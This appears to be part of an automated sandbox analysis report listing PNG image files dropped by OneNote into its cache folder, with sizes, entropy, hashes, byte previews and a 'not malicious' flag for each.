                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
